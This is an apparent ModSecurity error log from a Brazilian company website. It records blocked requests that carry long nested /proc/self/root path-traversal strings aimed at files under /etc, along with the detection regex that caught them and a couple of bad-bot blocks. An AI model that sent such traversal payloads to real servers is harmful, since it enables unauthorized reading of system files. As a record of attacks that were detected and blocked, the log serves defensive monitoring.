[Tue Mar 17 09:22:07.055002 2026] [:error] [pid 11469:tid 140411548894976] [client 74.7.243.203:58114] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablHb5DEJR9VXonE_-1N8QAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:22:07.095678 2026] [:error] [pid 7437:tid 140411632822016] [client 74.7.241.46:55894] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablHbweiSKl8TjouI-YBUQAAA80"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:22:48.794146 2026] [:error] [pid 2305:tid 140411565680384] [client 74.7.243.203:50610] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablHmAQohV2v-7oj5HH6PQAAAZU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:22:50.000237 2026] [:error] [pid 2325:tid 140411733534464] [client 74.7.241.46:39506] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablHme82sZHvlq4xgHrBlwAAAoE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:22:52.006443 2026] [:error] [pid 11293:tid 140411733534464] [client 74.7.241.46:53756] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablHnNCmCSWTlPouqorKWwAAAME"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:23:01.863480 2026] [:error] [pid 1210:tid 140411582465792] [client 74.7.243.203:50618] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablHpVKJy4A1bGlmj9BUWgAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:23:02.736615 2026] [:error] [pid 7000:tid 140411708356352] [client 74.7.241.46:36904] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablHphePVOt35XCGZP8ulQAAA4Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:23:07.018488 2026] [:error] [pid 1961:tid 140411641214720] [client 74.7.243.203:58872] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablHq3RXaaWotPICgYskhgAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:23:17.504662 2026] [:error] [pid 1016:tid 140411548894976] [client 74.7.244.31:41970] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablHtZqmL8PQht4WJFlGvgAAAVc"]
[Tue Mar 17 09:23:26.258040 2026] [:error] [pid 2473:tid 140411624429312] [client 74.7.241.46:54612] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablHvqBJNF7axNlVR0X7xwAAAA4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:23:32.883512 2026] [:error] [pid 2473:tid 140411624429312] [client 74.7.241.46:40632] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablHxKBJNF7axNlVR0X7zAAAAA4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:23:34.219055 2026] [:error] [pid 11293:tid 140411540502272] [client 74.7.241.46:33892] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablHxtCmCSWTlPouqorKZAAAANg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:23:40.440709 2026] [:error] [pid 1731:tid 140411548894976] [client 74.7.241.46:33900] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablHzAb2qCuy5irgBMjIcgAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:23:46.111030 2026] [:error] [pid 1926:tid 140411691570944] [client 74.7.243.203:58874] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablH0g1iGVhhz8eUyH7i2QAAAIY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:23:53.039746 2026] [:error] [pid 2553:tid 140411691570944] [client 74.7.228.16:60428] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablH2f0Bec_B9OkZP_i7-wAAAsY"]
[Tue Mar 17 09:24:16.607527 2026] [:error] [pid 2553:tid 140411641214720] [client 74.7.241.46:33808] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablH8P0Bec_B9OkZP_i8AwAAAsw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:24:20.812628 2026] [:error] [pid 1926:tid 140411616036608] [client 74.7.241.46:39396] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablH9A1iGVhhz8eUyH7i4gAAAI8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:24:56.527406 2026] [:error] [pid 2553:tid 140411716749056] [client 74.7.241.46:39402] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablIGP0Bec_B9OkZP_i8JAAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:25:01.999804 2026] [:error] [pid 2305:tid 140411658000128] [client 74.7.241.46:52684] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablIHQQohV2v-7oj5HH6XAAAAYo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:25:05.431693 2026] [:error] [pid 2659:tid 140411540502272] [client 74.7.241.46:48588] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablIIUTmPU-2Y17BMWW0RgAAAxg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:25:06.815157 2026] [:error] [pid 2659:tid 140411632822016] [client 74.7.241.46:48594] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablIIkTmPU-2Y17BMWW0RwAAAw0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:25:08.135269 2026] [:error] [pid 2325:tid 140411658000128] [client 74.7.241.46:47482] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablIJO82sZHvlq4xgHrBpQAAAoo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:25:09.612587 2026] [:error] [pid 2659:tid 140411649607424] [client 74.7.241.46:47490] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] 